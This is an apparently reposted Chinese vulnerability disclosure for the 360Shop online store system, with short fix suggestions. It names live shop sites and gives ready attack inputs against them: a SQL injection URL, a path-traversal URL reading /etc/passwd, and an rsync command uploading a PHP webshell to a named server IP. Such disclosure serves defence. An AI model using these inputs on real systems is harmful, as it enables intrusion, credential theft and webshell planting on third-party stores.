网站地图    收藏   

主页 > 后端 > 网站安全 >

360Shop网店系统多个漏洞(含getshell) - 网站安全 -

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 360Shop网店系统多个漏洞,部分漏洞可getshell。详细说明:官网:http://www.360shop.com.cn测试基于360Shop最新版本V3.0使用这套系统的有独立的站点,如http://www.iplaybox.nethttp://www.lpxxw.net也有托管...

360Shop网店系统多个漏洞,部分漏洞可getshell。
详细说明:官网:http://www.360shop.com.cn
测试基于360Shop最新版本V3.0
 
使用这套系统的有独立的站点,如
http://www.iplaybox.net
http://www.lpxxw.net
也有托管给官方的网店,这个比较多,可能有几千个,如:
http://09pf.taodiantong.com
http://520mpai.taodiantong.com
 
 
1. SQL注入
测试地址:
http://www.iplaybox.net/?do=display&mod=goods&id=10839
Mysql错显Integer型注入,POST方法。
 
 
 
 
后台地址:http://www.iplaybox.net/admin/login.php
 
 
 
 
漏洞参数为 www.2cto.com xajaxargs
 
function initProcessRequests()
    {
        $xajaxRequest = array();
        $xajaxRequest['xajaxr'] = @$_GET['xajaxr'];
        $xajaxRequest['xajax'] = @$_GET['xajax'];
        // reset RequestMode
        if(isset($_GET['xajax']))
        {
            $_GET['xajax'] = null;
            unset($_GET['xajax']);
        }
        // get the upload file local path
        foreach(array_keys($_FILES) as $name)
        {
            if(isset($_GET[$name]) && !isset($_POST[$name]))
            {
                $_POST[$name] = $this->_decodeUTF8Data($_GET[$name]);
            }
        }
        $xajaxargs = array(get_original_data($_POST));
        $xajaxRequest['xajaxargs'] = $xajaxargs;
        $_POST = $xajaxRequest;
}
 
2. 本地文件包含。
http://www.iplaybox.net/?do=display&id=3653&mod=../../../../../../../../../../etc/passwd%00.jpg
 
 
 
普通用户没有上传点,后台上传的图片也都到了官方提供的服务器上了,漏洞比较鸡肋。
 
3. Rsync任意文件上传。
推测一些网店用的是360Shop官方提供的服务器,使用了同样版本的Linux,PHP和Nginx。其中部分服务器的Web目录直接Rsync可写,导致可直接上传Shell。
 
rsync.exe 360shop/shell.php root@121.52.224.82::lsa/admin
 
 
 
 
上传的shell。
 
 

 
 
目前网上貌似没有暴出该网店系统的漏洞,且网店和支付宝有接口,有撞库的可能。请cncert通知官方,依情况看是否要发布此漏洞~


修复方案:

1. 过滤。
2. Rsync设置验证。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论